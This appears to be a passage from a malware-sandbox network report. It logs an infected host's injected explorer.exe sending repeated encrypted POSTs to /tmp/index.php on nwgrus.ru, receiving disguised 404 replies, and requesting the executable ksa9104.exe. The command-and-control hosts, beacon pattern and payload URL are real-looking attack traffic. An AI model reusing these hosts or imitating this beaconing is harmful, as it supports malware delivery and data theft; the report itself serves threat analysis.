                                                                                                                            Oct 3, 2024 02:52:55.103493929 CEST128OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3b 31 b4 ea
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu;1VzTv't_)~w)puAk
                                                                                                                            Oct 3, 2024 02:52:56.192848921 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:55 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.449765190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:56.206717014 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://ticrvurjrjsf.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 340
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:56.206743002 CEST340OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 2e 37 d6 9d
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu.7}[wu)y/Qe/tv@tW=Y@L.M+6P/N16@0(BqFVIdiP>/W'5gjsRa
                                                                                                                            Oct 3, 2024 02:52:57.296926975 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:57 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.449766190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:57.304415941 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://drnoexjyrauki.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 159
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:57.304440975 CEST159OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 7e 38 e5 f0
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu~8u r=!_\yn4_gK{ 8Q/%2/H;B3
                                                                                                                            Oct 3, 2024 02:52:58.422266006 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:58 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.449767190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:58.452884912 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://wbbiwyhshhf.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 298
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:58.452886105 CEST298OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 67 4f ad aa
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vugOL6\kj}]cO27fUHz6kUCJ]P'N-dC,AU}4UF.'`K{')kxJU&
                                                                                                                            Oct 3, 2024 02:52:59.537938118 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:59 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.449786190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:07.901981115 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://wvjpwlsevsc.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 151
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:07.902046919 CEST151OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 33 ae 8a
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vud3dyC{"{'WJ?j QGcVZIw(^Q
                                                                                                                            Oct 3, 2024 02:54:09.019166946 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:08 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.449787190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:14.677408934 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://vssaauwgvmedfq.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 253
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:14.677423954 CEST253OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 1d cf a9
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu2vN>SN0f$VsAQ,EBDcPQ%Wpcy>7&e,+ikC?)\+!kL[ee8k.?
                                                                                                                            Oct 3, 2024 02:54:15.772309065 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:15 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.449788190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:23.080152035 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://pubortabbcvvvfcg.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 342
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:23.080184937 CEST342OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 1f ce ee
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu<OxU[a6Q&2v(jU;C$54+!@P?(C':W@;"-b'+2J.F~erpLrDi7V7b
                                                                                                                            Oct 3, 2024 02:54:24.173683882 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:23 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.449789190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:30.642303944 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://vfyrxdwalbtb.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 151
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:30.642373085 CEST151OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 02 d4 80
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuJ5S^xN]J0T/nGG?1O^ 2g5MP^L(
                                                                                                                            Oct 3, 2024 02:54:31.822818995 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:31 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.449790190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:40.346215963 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://nyhrbrqisswma.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 220
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:40.346232891 CEST220OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 54 de a7
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuxTQcj<iaT,wL$f<QP9 +>PB\?y) PTX'"Z-^n
                                                                                                                            Oct 3, 2024 02:54:41.494410038 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:41 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.449792201.212.52.197802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:54:55.349387884 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://mtigasxvtneuwtdj.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 284
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:54:55.349399090 CEST284OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 30 dc f3
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu?0Oay;K?V-ncPyj8|.^rn-'7d"g)},VV\$0|a9c@QBEsfsGiqg;"I)
                                                                                                                            Oct 3, 2024 02:54:56.653625011 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:54:56 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.449794201.212.52.197802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:55:12.858268023 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://frgbxqyrenbq.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 354
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:55:12.858299971 CEST354OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 3c b7 9c
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuz<p^logmOKU#x6beFV4>1*GOTABQfht9nCy1qf*^W> <gh=^l\#33
                                                                                                                            Oct 3, 2024 02:55:14.179193020 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:13 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.449796201.212.52.197802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:55:30.057107925 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://ahaddcjrcpv.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 166
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:55:30.057107925 CEST166OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 43 a7 80
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu]CRy+%(kk`/x{bYS9c$X@Ub1L"m
                                                                                                                            Oct 3, 2024 02:55:31.392007113 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:31 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.449798201.212.52.197802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:55:47.915378094 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://iqyabdaoinn.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 199
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:55:47.915433884 CEST199OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 0f c8 ee
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuYr&raN2Q9<s6>dGxq4_7S&Q/2/WwJJ&vo5$XAKz
                                                                                                                            Oct 3, 2024 02:55:49.226342916 CEST151INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:55:48 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.44976123.145.40.1644432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:52:53 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
